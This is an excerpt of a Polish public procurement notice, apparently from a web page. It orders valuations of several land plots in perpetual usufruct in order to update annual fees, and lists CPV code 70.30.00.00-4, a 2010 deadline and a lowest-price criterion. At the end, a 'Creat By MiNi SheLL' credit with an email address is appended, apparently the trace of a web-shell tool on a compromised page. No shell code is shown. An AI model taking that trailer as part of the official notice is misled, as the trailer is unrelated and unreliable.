Celem wyceny jest określenie wartości rynkowej gruntu w związku z aktualizacją opłaty rocznej z tytułu użytkowania wieczystego, z uwzględnieniem art. 77 ust. 4, 5, 6 ustawy z dnia 21 sierpnia 1997r. o gospodarce nieruchomościami (Dz. U. z 2010r. Nr 102, poz. 651 z póżn. zm.)
8. ul. 1905 Roku, dz. nr 67/18 o pow. 2429m2 (Obr. VIII, ark. 99), KW Nr RA1R/00110490/9, nieruchomość w użytkowaniu wieczystym osoby fizycznej.
Celem wyceny jest określenie wartości rynkowej gruntu w związku z aktualizacją opłaty rocznej z tytułu użytkowania wieczystego, z uwzględnieniem art. 77 ust. 4, 5, 6 ustawy z dnia 21 sierpnia 1997r. o gospodarce nieruchomościami (Dz. U. z 2010r. Nr 102, poz. 651 z póżn. zm.)
9. ul. Marywilskiej, dz. nr 67/24 o pow. 1207m2 (Obr. VIII, ark. 99), KW Nr RA1R/00112921/4, nieruchomość w użytkowaniu wieczystym osoby prawnej.
Celem wyceny jest określenie wartości rynkowej gruntu w związku z aktualizacją opłaty rocznej z tytułu użytkowania wieczystego, z uwzględnieniem art. 77 ust. 4, 5, 6 ustawy z dnia 21 sierpnia 1997r. o gospodarce nieruchomościami (Dz. U. z 2010r. Nr 102, poz. 651 z póżn. zm.)
10. ul. Marywilskiej, dz. nr 67/25 o pow. 1897m2 (Obr. VIII, ark. 99), KW Nr RA1R/00112997/7, nieruchomość w użytkowaniu wieczystym osoby prawnej.
Celem wyceny jest określenie wartości rynkowej gruntu w związku z aktualizacją opłaty rocznej z tytułu użytkowania wieczystego, z uwzględnieniem art. 77 ust. 4, 5, 6 ustawy z dnia 21 sierpnia 1997r. o gospodarce nieruchomościami (Dz. U. z 2010r. Nr 102, poz. 651 z póżn. zm.).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.30.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 01.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com